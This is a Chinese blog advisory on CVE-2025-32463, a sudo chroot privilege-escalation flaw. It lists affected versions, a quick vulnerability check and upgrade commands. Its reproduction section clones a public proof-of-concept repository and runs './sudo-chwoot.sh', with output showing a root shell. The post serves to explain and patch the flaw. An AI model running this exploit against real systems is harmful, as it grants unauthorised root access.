不容小觑的威胁:CVE-2025-32463 Linux提权漏洞,轻松利用却要紧急修复
漏洞描述
CVE-2025-32463
是一个存在于 Linux 系统 sudo 组件中的高危本地权限提升漏洞,主要与 chroot 功能的安全性弱点相关。此漏洞允许攻击者通过精心构造特定的环境变量,在执行 sudo chroot
命令时规避既定的安全约束,进而非法获取目标系统的 root 权限。该安全问题的根本原因在于 chroot 机制在处理来自不可信源的输入时存在缺陷,未能有效防止潜在的权限升级攻击向量。
影响组件
Linux 是一个免费且开源的操作系统,其设计灵感来源于 Unix,并在服务器、嵌入式系统以及云计算平台等领域得到了广泛应用。
作为 Linux 系统中管理权限的关键机制之一,sudo
允许经过授权的用户临时性地获取 root 或其他指定用户的权限以执行特定命令。这一机制不仅增强了系统的安全性,同时也简化了操作日志的记录与审计流程。
影响版本
大多数Linux
发行版上的sudo 1.9.14
至1.9.17
(所有p修订版)的易受攻击版本都会受到影响。
漏洞复现
关注公众号回复: CVE-2025-32463
获取提权exp
快速检查漏洞
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
Docker容器中的测试漏洞
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
修复建议
建议立即进行升级:将 sudo 更新至 1.9.17p1 或更高版本。目前,主流 Linux 发行版已提供相应的安全补丁,用户可通过执行以下命令来完成更新过程。
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
推荐文章
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 攻城狮小林
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果